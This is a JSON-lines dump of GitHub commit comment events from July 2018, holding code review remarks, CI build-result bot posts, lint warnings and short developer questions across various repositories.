{"id":"7926681269","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"aniketkhara/overlay"},"payload":{"comment":{"id":29616256,"position":15,"line":15,"path":"media.html","commit_id":"c879e84d06347e3a67b6b8eb5c263513d19fc3a3","created_at":"2018-07-06T03:44:57Z","updated_at":"2018-07-06T03:44:57Z","author_association":"NONE","body":"What is \"and\" class ? use proper conventions for class names"}},"created_at":"2018-07-06T03:44:57Z"}
{"id":"7926681651","type":"CommitCommentEvent","actor":{"login":"thibaultcha"},"repo":{"name":"Kong/docs.konghq.com"},"payload":{"comment":{"id":29616258,"position":5,"line":123,"path":"gulpfile.js","commit_id":"b8e4394263f523db7a3a830a3a2674f7778848fa","created_at":"2018-07-06T03:45:08Z","updated_at":"2018-07-06T03:45:08Z","author_association":"MEMBER","body":"@kikito Can you share more context on the reasons behind this change?"}},"created_at":"2018-07-06T03:45:08Z"}
{"id":"7926682471","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"aniketkhara/overlay"},"payload":{"comment":{"id":29616261,"position":18,"line":18,"path":"media.html","commit_id":"c879e84d06347e3a67b6b8eb5c263513d19fc3a3","created_at":"2018-07-06T03:45:28Z","updated_at":"2018-07-06T03:45:28Z","author_association":"NONE","body":"Indentations must be followed. Check the whole file neatly. "}},"created_at":"2018-07-06T03:45:28Z"}
{"id":"7926682722","type":"CommitCommentEvent","actor":{"login":"Cz166"},"repo":{"name":"Cz166/app_day08"},"payload":{"comment":{"id":29616262,"position":null,"line":null,"path":null,"commit_id":"1477967cabafe85c0fee3a8c79ba5fe23f23fbe2","created_at":"2018-07-06T03:45:35Z","updated_at":"2018-07-06T03:45:35Z","author_association":"OWNER","body":"hello\r\npycharm"}},"created_at":"2018-07-06T03:45:35Z"}
{"id":"7926686321","type":"CommitCommentEvent","actor":{"login":"Koh0214"},"repo":{"name":"Koh0214/narou-matome"},"payload":{"comment":{"id":29616264,"position":null,"line":null,"path":null,"commit_id":"17b159bc9c33ff634c8197a4e97d559a978cc18a","created_at":"2018-07-06T03:47:11Z","updated_at":"2018-07-06T03:47:11Z","author_association":"OWNER","body":"matomes contoroller | user nokogiri except mechanize\r\n\r\ntypo\r\n\r\nuser > use"}},"created_at":"2018-07-06T03:47:11Z"}
{"id":"7926686903","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"sagarsaindre/Htmlassignments"},"payload":{"comment":{"id":29616265,"position":47,"line":36,"path":"HTML_Assignments/css/style.css","commit_id":"703157d1109b7dbb914f21ed289bf5596c4dd7a4","created_at":"2018-07-06T03:47:27Z","updated_at":"2018-07-06T03:47:27Z","author_association":"NONE","body":"What does this class mean ? Isnt it should be something like \"overlay\""}},"created_at":"2018-07-06T03:47:27Z"}
{"id":"7926687699","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"sagarsaindre/Htmlassignments"},"payload":{"comment":{"id":29616266,"position":72,"line":67,"path":"HTML_Assignments/css/style.css","commit_id":"703157d1109b7dbb914f21ed289bf5596c4dd7a4","created_at":"2018-07-06T03:47:47Z","updated_at":"2018-07-06T03:47:47Z","author_association":"NONE","body":"Check Indentations"}},"created_at":"2018-07-06T03:47:47Z"}
{"id":"7926688132","type":"CommitCommentEvent","actor":{"login":"rasa"},"repo":{"name":"scoopinstaller/binary-mirror"},"payload":{"comment":{"id":29616267,"position":null,"line":null,"path":null,"commit_id":"15d00e1741de602d9943b4a02a84a0a884e702b1","created_at":"2018-07-06T03:47:58Z","updated_at":"2018-07-06T03:47:58Z","author_association":"NONE","body":"Original location is still up at: ftp://ftp.info-zip.org/pub/infozip/win32/unz600sh.exe"}},"created_at":"2018-07-06T03:47:58Z"}
{"id":"7926689921","type":"CommitCommentEvent","actor":{"login":"matings"},"repo":{"name":"matings/MyVerticalTabLayout"},"payload":{"comment":{"id":29616268,"position":null,"line":null,"path":null,"commit_id":"42b3fd146d50518ef07eb8b0faffa729cbaef9f8","created_at":"2018-07-06T03:48:46Z","updated_at":"2018-07-06T03:48:46Z","author_association":"OWNER","body":"注解"}},"created_at":"2018-07-06T03:48:46Z"}
{"id":"7926690327","type":"CommitCommentEvent","actor":{"login":"rasa"},"repo":{"name":"scoopinstaller/binary-mirror"},"payload":{"comment":{"id":29616270,"position":null,"line":null,"path":null,"commit_id":"a59dcd2e33edf691fdbd8cbf39e3e52298bf5777","created_at":"2018-07-06T03:48:58Z","updated_at":"2018-07-06T03:48:58Z","author_association":"NONE","body":"Original location is still up at: ftp://ftp.info-zip.org/pub/infozip/win32/zip300xn.zip and ftp://ftp.info-zip.org/pub/infozip/win32/zip300xn-x64.zip"}},"created_at":"2018-07-06T03:48:58Z"}
{"id":"7926692783","type":"CommitCommentEvent","actor":{"login":"pranav-patil"},"repo":{"name":"pranav-patil/spring-microservices"},"payload":{"comment":{"id":29616277,"position":12,"line":12,"path":"config-service/README.md","commit_id":"e09f1ff26b7f4f402270b34b146ec1f0f6cc36f9","created_at":"2018-07-06T03:50:06Z","updated_at":"2018-07-06T03:50:06Z","author_association":"OWNER","body":"It is important to add local_policy.jar and US_export_policy.jar files from [Oracle JRE website](http://www.oracle.com/technetwork/java/javase/downloads/index.html) into **$JAVA_HOME/jre/lib/security** directory. This prevents below **java.security.InvalidKeyException**.\r\n\r\n```\r\njava.security.InvalidKeyException: Illegal key size\r\nat javax.crypto.Cipher.checkCryptoPerm(Cipher.java:1039)\r\nat javax.crypto.Cipher.implInit(Cipher.java:805)\r\nat javax.crypto.Cipher.chooseProvider(Cipher.java:864)\r\nat javax.crypto.Cipher.init(Cipher.java:1396)\r\nat javax.crypto.Cipher.init(Cipher.java:1327)\r\n```"}},"created_at":"2018-07-06T03:50:06Z"}
{"id":"7926695654","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29616279,"position":null,"line":null,"path":null,"commit_id":"aae388b45b15dd61bf1a1356c58b08321deee879","created_at":"2018-07-06T03:51:19Z","updated_at":"2018-07-06T03:51:19Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (rraustad) - x86_64-MacOS-10.9-clang: OK (2933 of 2933 tests passed, 9 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 1 test had: ERR diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aae388b45b15dd61bf1a1356c58b08321deee879-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aae388b45b15dd61bf1a1356c58b08321deee879-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T03:51:19Z"}
{"id":"7926701866","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"antretterf/EnergyPlus"},"payload":{"comment":{"id":29616293,"position":null,"line":null,"path":null,"commit_id":"f3da7217b803b6bc1de06c6a9e9884b017ba381c","created_at":"2018-07-06T03:54:05Z","updated_at":"2018-07-06T03:54:05Z","author_association":"NONE","body":"HAMT1_180406 (antretterf) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2963 of 2968 tests passed, 13 test warnings)\n\nMessages:\n\n * 1 test had: BND diffs.\n * 7 tests had: EIO diffs.\n * 5 tests had: ESO big diffs.\n * 4 tests had: Table big diffs.\n * 13 tests had: AUD diffs.\n * 2 tests had: ESO small diffs.\n * 2 tests had: Table small diffs.\n * 2 tests had: MTD diffs.\n * 3 tests had: MTR big diffs.\n * 1 test had: ERR diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 640\n * Failed: 5\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.83%25-yellow.png)</a> \n"}},"created_at":"2018-07-06T03:54:05Z"}
{"id":"7926702640","type":"CommitCommentEvent","actor":{"login":"liuxianen"},"repo":{"name":"liuxianen/feijidazan--liuxianen"},"payload":{"comment":{"id":29616296,"position":null,"line":null,"path":null,"commit_id":"f3113f5df5c2797dc41bfbfd8a5a01f60e04bf0b","created_at":"2018-07-06T03:54:23Z","updated_at":"2018-07-06T03:54:23Z","author_association":"OWNER","body":"fsdf"}},"created_at":"2018-07-06T03:54:23Z"}
{"id":"7926706015","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29616307,"position":null,"line":null,"path":null,"commit_id":"11d3f513e2a6a287e09cdfe45b565de82d6ebe17","created_at":"2018-07-06T03:55:49Z","updated_at":"2018-07-06T03:55:49Z","author_association":"NONE","body":"HotFix-FailingHXUnitTest (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11d3f513e2a6a287e09cdfe45b565de82d6ebe17-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11d3f513e2a6a287e09cdfe45b565de82d6ebe17-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T03:55:49Z"}
{"id":"7926706644","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29616309,"position":null,"line":null,"path":null,"commit_id":"6745e4fdcaad638271f930092c0c0db3de2e253f","created_at":"2018-07-06T03:56:06Z","updated_at":"2018-07-06T03:56:06Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-06T03:56:06Z"}
{"id":"7926712319","type":"CommitCommentEvent","actor":{"login":"ZaraPHP"},"repo":{"name":"ZaraPHP/Source"},"payload":{"comment":{"id":29616317,"position":null,"line":null,"path":null,"commit_id":"a0227d92ea07a67d87eea0bfe9df00bfbe796143","created_at":"2018-07-06T03:58:38Z","updated_at":"2018-07-06T03:58:38Z","author_association":"OWNER","body":"[Uploading Sourse.zip…]()\r\n"}},"created_at":"2018-07-06T03:58:38Z"}
{"id":"7926713885","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"antretterf/EnergyPlus"},"payload":{"comment":{"id":29616318,"position":null,"line":null,"path":null,"commit_id":"f3da7217b803b6bc1de06c6a9e9884b017ba381c","created_at":"2018-07-06T03:59:22Z","updated_at":"2018-07-06T03:59:22Z","author_association":"NONE","body":"HAMT1_180406 (antretterf) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-06T03:59:22Z"}
{"id":"7926719451","type":"CommitCommentEvent","actor":{"login":"grreddy1978"},"repo":{"name":"openalpr/openalpr"},"payload":{"comment":{"id":29616332,"position":null,"line":null,"path":null,"commit_id":"5097221a464edf8f5f33bd0569bbdf45dd5baa31","created_at":"2018-07-06T04:01:36Z","updated_at":"2018-07-06T04:01:36Z","author_association":"NONE","body":"Hi Mat,\r\n\r\nI would like to know if we can run OpenALPR build on Ubuntu. Please let me know if it can run.\r\n\r\nCan you please give me the steps to train detector and ocr for both Multi Line and Single Line plates. There are both single and two lines found in my country.\r\n\r\nPlease advice me.\r\n\r\nThanks and Regards\r\nRavi"}},"created_at":"2018-07-06T04:01:36Z"}
{"id":"7926725058","type":"CommitCommentEvent","actor":{"login":"Akianonymus"},"repo":{"name":"chil360/android_device_motorola_msm8916-common"},"payload":{"comment":{"id":29616336,"position":4,"line":114,"path":"msm8916.mk","commit_id":"98f2bd5482a83364851474e253690bd37cf7172f","created_at":"2018-07-06T04:04:05Z","updated_at":"2018-07-06T04:04:05Z","author_association":"NONE","body":"what does this do?"}},"created_at":"2018-07-06T04:04:05Z"}
{"id":"7926731420","type":"CommitCommentEvent","actor":{"login":"jnfoster"},"repo":{"name":"frenetic-lang/frenetic"},"payload":{"comment":{"id":29616351,"position":5,"line":1679,"path":"src/Symbolic.ml","commit_id":"a22e18105bde80ac0f45c0f78beae9a6336bc861","created_at":"2018-07-06T04:06:54Z","updated_at":"2018-07-06T04:06:54Z","author_association":"MEMBER","body":"This definition only appears in every other paper by Kozen, so it's easy to see how it could be missed :-)"}},"created_at":"2018-07-06T04:06:54Z"}
{"id":"7926732194","type":"CommitCommentEvent","actor":{"login":"ZaraPHP"},"repo":{"name":"ZaraPHP/Source"},"payload":{"comment":{"id":29616353,"position":null,"line":null,"path":null,"commit_id":"a0227d92ea07a67d87eea0bfe9df00bfbe796143","created_at":"2018-07-06T04:07:16Z","updated_at":"2018-07-06T04:07:16Z","author_association":"OWNER","body":"[Sourse.zip](https://github.com/ZaraPHP/Source/files/2168977/Sourse.zip)\r\n"}},"created_at":"2018-07-06T04:07:16Z"}
{"id":"7926732825","type":"CommitCommentEvent","actor":{"login":"rhinomonkey"},"repo":{"name":"heliumchain/helium"},"payload":{"comment":{"id":29616354,"position":null,"line":null,"path":null,"commit_id":"8b81259559b22298aea37076e077c8e9a2e7d4c8","created_at":"2018-07-06T04:07:33Z","updated_at":"2018-07-06T04:07:33Z","author_association":"CONTRIBUTOR","body":"Added 2nd Treasury Address"}},"created_at":"2018-07-06T04:07:33Z"}
{"id":"7926734863","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29616357,"position":null,"line":null,"path":null,"commit_id":"99f7582398748db7570e5e995137b8103b9d7ebd","created_at":"2018-07-06T04:08:32Z","updated_at":"2018-07-06T04:08:32Z","author_association":"NONE","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2309 of 2309 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T04:08:32Z"}
{"id":"7926739861","type":"CommitCommentEvent","actor":{"login":"rousskov"},"repo":{"name":"measurement-factory/squid"},"payload":{"comment":{"id":29616366,"position":18,"line":54,"path":"src/Store.h","commit_id":"e4aab7b83d620f2f0d45f636848d619387ec7339","created_at":"2018-07-06T04:10:53Z","updated_at":"2018-07-06T04:10:53Z","author_association":"NONE","body":"If possible, make this member a reference rather than a pointer. Otherwise, implement proper locking/unlocking/copying."}},"created_at":"2018-07-06T04:10:53Z"}
{"id":"7926742571","type":"CommitCommentEvent","actor":{"login":"RealHospital"},"repo":{"name":"HoDaDak/Lonely"},"payload":{"comment":{"id":29616368,"position":null,"line":null,"path":null,"commit_id":"093525b68942785bec84026d08318aa4e2fcdf35","created_at":"2018-07-06T04:12:08Z","updated_at":"2018-07-06T04:12:08Z","author_association":"CONTRIBUTOR","body":"All personnel have completed it."}},"created_at":"2018-07-06T04:12:08Z"}
{"id":"7926745104","type":"CommitCommentEvent","actor":{"login":"mdmahmudurrahman"},"repo":{"name":"devtuananh/sample_app"},"payload":{"comment":{"id":29616372,"position":2,"line":6,"path":"Gemfile","commit_id":"920d20d163ddca2d0e3d888f81f8b5a4fed65263","created_at":"2018-07-06T04:13:20Z","updated_at":"2018-07-06T04:13:20Z","author_association":"NONE","body":"Please remove all of the comments."}},"created_at":"2018-07-06T04:13:20Z"}
{"id":"7926747266","type":"CommitCommentEvent","actor":{"login":"mdmahmudurrahman"},"repo":{"name":"devtuananh/sample_app"},"payload":{"comment":{"id":29616379,"position":3,"line":7,"path":"Gemfile","commit_id":"920d20d163ddca2d0e3d888f81f8b5a4fed65263","created_at":"2018-07-06T04:14:15Z","updated_at":"2018-07-06T04:14:15Z","author_association":"NONE","body":"Instead of using single quote, please use double quote"}},"created_at":"2018-07-06T04:14:15Z"}
{"id":"7926747890","type":"CommitCommentEvent","actor":{"login":"mdmahmudurrahman"},"repo":{"name":"devtuananh/sample_app"},"payload":{"comment":{"id":29616380,"position":1,"line":1,"path":"app/assets/javascripts/users.coffee","commit_id":"920d20d163ddca2d0e3d888f81f8b5a4fed65263","created_at":"2018-07-06T04:14:32Z","updated_at":"2018-07-06T04:14:32Z","author_association":"NONE","body":"Remove this unused file."}},"created_at":"2018-07-06T04:14:32Z"}
{"id":"7926751367","type":"CommitCommentEvent","actor":{"login":"rousskov"},"repo":{"name":"measurement-factory/squid"},"payload":{"comment":{"id":29616387,"position":6,"line":341,"path":"src/store.cc","commit_id":"e4aab7b83d620f2f0d45f636848d619387ec7339","created_at":"2018-07-06T04:16:11Z","updated_at":"2018-07-06T04:16:11Z","author_association":"NONE","body":"This allocation is a showstopper: It is too expensive performance-wise, undoes any benefits of the (eventual) removal of StoreEntry vtable, and adds 8 bytes to every non-shared cache entry!\r\n\r\nAFAICT, the only way removing the Packer parent can work if we create StoreEntryPackers when they are needed. I hope (but cannot tell for sure) that it is possible to do that without refactoring a lot of code. Changing callers is probably inevitable. Adding a line before most callers may be necessary and is acceptable."}},"created_at":"2018-07-06T04:16:11Z"}
{"id":"7926752806","type":"CommitCommentEvent","actor":{"login":"mdmahmudurrahman"},"repo":{"name":"devtuananh/sample_app"},"payload":{"comment":{"id":29616390,"position":2,"line":2,"path":"app/assets/stylesheets/custom.scss","commit_id":"920d20d163ddca2d0e3d888f81f8b5a4fed65263","created_at":"2018-07-06T04:16:52Z","updated_at":"2018-07-06T04:16:52Z","author_association":"NONE","body":"Please use single quote in CSS"}},"created_at":"2018-07-06T04:16:52Z"}
{"id":"7926754738","type":"CommitCommentEvent","actor":{"login":"mdmahmudurrahman"},"repo":{"name":"devtuananh/sample_app"},"payload":{"comment":{"id":29616393,"position":7,"line":7,"path":"app/assets/stylesheets/custom.scss","commit_id":"920d20d163ddca2d0e3d888f81f8b5a4fed65263","created_at":"2018-07-06T04:17:42Z","updated_at":"2018-07-06T04:17:42Z","author_association":"NONE","body":"Please use 2 space indentation and fix it for all of the files. "}},"created_at":"2018-07-06T04:17:42Z"}
{"id":"7926757883","type":"CommitCommentEvent","actor":{"login":"mdmahmudurrahman"},"repo":{"name":"devtuananh/sample_app"},"payload":{"comment":{"id":29616397,"position":26,"line":26,"path":"app/assets/stylesheets/custom.scss","commit_id":"920d20d163ddca2d0e3d888f81f8b5a4fed65263","created_at":"2018-07-06T04:19:11Z","updated_at":"2018-07-06T04:19:11Z","author_association":"NONE","body":"Remove this extra line break"}},"created_at":"2018-07-06T04:19:11Z"}
{"id":"7926759095","type":"CommitCommentEvent","actor":{"login":"mdmahmudurrahman"},"repo":{"name":"devtuananh/sample_app"},"payload":{"comment":{"id":29616399,"position":59,"line":59,"path":"app/assets/stylesheets/custom.scss","commit_id":"920d20d163ddca2d0e3d888f81f8b5a4fed65263","created_at":"2018-07-06T04:19:45Z","updated_at":"2018-07-06T04:19:45Z","author_association":"NONE","body":"Remove extra line break"}},"created_at":"2018-07-06T04:19:45Z"}
{"id":"7926760965","type":"CommitCommentEvent","actor":{"login":"mdmahmudurrahman"},"repo":{"name":"devtuananh/sample_app"},"payload":{"comment":{"id":29616400,"position":108,"line":108,"path":"app/assets/stylesheets/custom.scss","commit_id":"920d20d163ddca2d0e3d888f81f8b5a4fed65263","created_at":"2018-07-06T04:20:37Z","updated_at":"2018-07-06T04:20:37Z","author_association":"NONE","body":"Add a new line break at the end of the file. "}},"created_at":"2018-07-06T04:20:37Z"}
{"id":"7926761527","type":"CommitCommentEvent","actor":{"login":"mdmahmudurrahman"},"repo":{"name":"devtuananh/sample_app"},"payload":{"comment":{"id":29616401,"position":1,"line":1,"path":"app/assets/stylesheets/users.scss","commit_id":"920d20d163ddca2d0e3d888f81f8b5a4fed65263","created_at":"2018-07-06T04:20:55Z","updated_at":"2018-07-06T04:20:55Z","author_association":"NONE","body":"Remove this extra file. "}},"created_at":"2018-07-06T04:20:55Z"}
{"id":"7926762167","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29616402,"position":null,"line":null,"path":null,"commit_id":"99f7582398748db7570e5e995137b8103b9d7ebd","created_at":"2018-07-06T04:21:15Z","updated_at":"2018-07-06T04:21:15Z","author_association":"NONE","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2309 of 2309 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T04:21:15Z"}
{"id":"7926762526","type":"CommitCommentEvent","actor":{"login":"mdmahmudurrahman"},"repo":{"name":"devtuananh/sample_app"},"payload":{"comment":{"id":29616405,"position":1,"line":1,"path":"app/helpers/users_helper.rb","commit_id":"920d20d163ddca2d0e3d888f81f8b5a4fed65263","created_at":"2018-07-06T04:21:25Z","updated_at":"2018-07-06T04:21:25Z","author_association":"NONE","body":"Remove this unused file. "}},"created_at":"2018-07-06T04:21:25Z"}
{"id":"7926763262","type":"CommitCommentEvent","actor":{"login":"mdmahmudurrahman"},"repo":{"name":"devtuananh/sample_app"},"payload":{"comment":{"id":29616410,"position":13,"line":13,"path":"app/views/layouts/_footer.html.erb","commit_id":"920d20d163ddca2d0e3d888f81f8b5a4fed65263","created_at":"2018-07-06T04:21:44Z","updated_at":"2018-07-06T04:21:44Z","author_association":"NONE","body":"Add a new line break at the end of the file."}},"created_at":"2018-07-06T04:21:44Z"}
{"id":"7926763448","type":"CommitCommentEvent","actor":{"login":"mdmahmudurrahman"},"repo":{"name":"devtuananh/sample_app"},"payload":{"comment":{"id":29616412,"position":12,"line":12,"path":"app/views/layouts/_header.html.erb","commit_id":"920d20d163ddca2d0e3d888f81f8b5a4fed65263","created_at":"2018-07-06T04:21:49Z","updated_at":"2018-07-06T04:21:49Z","author_association":"NONE","body":"Add a new line break at the end of the file."}},"created_at":"2018-07-06T04:21:49Z"}
{"id":"7926764109","type":"CommitCommentEvent","actor":{"login":"mdmahmudurrahman"},"repo":{"name":"devtuananh/sample_app"},"payload":{"comment":{"id":29616417,"position":8,"line":8,"path":"app/views/layouts/_header.html.erb","commit_id":"920d20d163ddca2d0e3d888f81f8b5a4fed65263","created_at":"2018-07-06T04:22:09Z","updated_at":"2018-07-06T04:22:09Z","author_association":"NONE","body":"Use single quote"}},"created_at":"2018-07-06T04:22:09Z"}
{"id":"7926778276","type":"CommitCommentEvent","actor":{"login":"mdmahmudurrahman"},"repo":{"name":"devtuananh/sample_app"},"payload":{"comment":{"id":29616446,"position":1,"line":1,"path":"test/integration/site_layout_test.rb","commit_id":"920d20d163ddca2d0e3d888f81f8b5a4fed65263","created_at":"2018-07-06T04:28:34Z","updated_at":"2018-07-06T04:28:34Z","author_association":"NONE","body":"Same here like as the previous comment. "}},"created_at":"2018-07-06T04:28:34Z"}
{"id":"7926778391","type":"CommitCommentEvent","actor":{"login":"smolkaj"},"repo":{"name":"frenetic-lang/frenetic"},"payload":{"comment":{"id":29616447,"position":5,"line":1679,"path":"src/Symbolic.ml","commit_id":"a22e18105bde80ac0f45c0f78beae9a6336bc861","created_at":"2018-07-06T04:28:39Z","updated_at":"2018-07-06T04:28:39Z","author_association":"MEMBER","body":"The most obvious things are easiest to screw up :) "}},"created_at":"2018-07-06T04:28:39Z"}
{"id":"7926780055","type":"CommitCommentEvent","actor":{"login":"kavink"},"repo":{"name":"Netflix/aegisthus"},"payload":{"comment":{"id":29616449,"position":null,"line":null,"path":null,"commit_id":"cea5ecef79c843db7b4f03a0b1ac07f69933477c","created_at":"2018-07-06T04:29:27Z","updated_at":"2018-07-06T04:29:27Z","author_association":"NONE","body":"@danielbwatson just wanted to check if the Spark project is still active internally or its discontinued for something else ? "}},"created_at":"2018-07-06T04:29:27Z"}
{"id":"7926780710","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29616450,"position":109,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/drawerlayout/DrawerActivity.java","commit_id":"bb744682beb9efd00404cf36c7ca438414165206","created_at":"2018-07-06T04:29:46Z","updated_at":"2018-07-06T04:29:46Z","author_association":"NONE","body":"WARNING: [UseEqualsToCompareStrings] Use equals() to compare strings instead of '==' or '!='\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/strings.html#UseEqualsToCompareStrings"}},"created_at":"2018-07-06T04:29:46Z"}
{"id":"7926780721","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29616451,"position":115,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/drawerlayout/DrawerActivity.java","commit_id":"bb744682beb9efd00404cf36c7ca438414165206","created_at":"2018-07-06T04:29:46Z","updated_at":"2018-07-06T04:29:46Z","author_association":"NONE","body":"WARNING: [UseEqualsToCompareStrings] Use equals() to compare strings instead of '==' or '!='\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/strings.html#UseEqualsToCompareStrings"}},"created_at":"2018-07-06T04:29:46Z"}
{"id":"7926780732","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29616452,"position":141,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/drawerlayout/DrawerActivity.java","commit_id":"bb744682beb9efd00404cf36c7ca438414165206","created_at":"2018-07-06T04:29:46Z","updated_at":"2018-07-06T04:29:46Z","author_association":"NONE","body":"WARNING: [AvoidPrintStackTrace] Avoid printStackTrace(); use a logger call instead.\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/logging-java.html#AvoidPrintStackTrace"}},"created_at":"2018-07-06T04:29:46Z"}
{"id":"7926780813","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29616453,"position":2,"line":null,"path":"app/src/at-thanhhoang/res/layout/custom_item_function.xml","commit_id":"bb744682beb9efd00404cf36c7ca438414165206","created_at":"2018-07-06T04:29:49Z","updated_at":"2018-07-06T04:29:49Z","author_association":"NONE","body":"WARNING: [UseCompoundDrawables] This tag and its children can be replaced by one `<TextView/>` and a compound drawable\n A `LinearLayout` which contains an `ImageView` and a `TextView` can be more efficiently handled as a compound drawable (a single TextView, using the `drawableTop`, `drawableLeft`, `drawableRight` and/or `drawableBottom` attributes to draw one or more images adjacent to the text).\n\nIf the two widgets are offset from each other with margins, this can be replaced with a `drawablePadding` attribute.\n\nThere's a lint quickfix to perform this conversion in the Eclipse plugin."}},"created_at":"2018-07-06T04:29:49Z"}
{"id":"7926786072","type":"CommitCommentEvent","actor":{"login":"mdmahmudurrahman"},"repo":{"name":"devtuananh/sample_app"},"payload":{"comment":{"id":29616463,"position":6,"line":18,"path":"app/assets/stylesheets/application.scss","commit_id":"920d20d163ddca2d0e3d888f81f8b5a4fed65263","created_at":"2018-07-06T04:32:11Z","updated_at":"2018-07-06T04:32:11Z","author_association":"NONE","body":"Remove the following codes from this file. \r\n``\r\n+@import \"bootstrap-sprockets\";\r\n +@import \"bootstrap\";\r\n``"}},"created_at":"2018-07-06T04:32:11Z"}
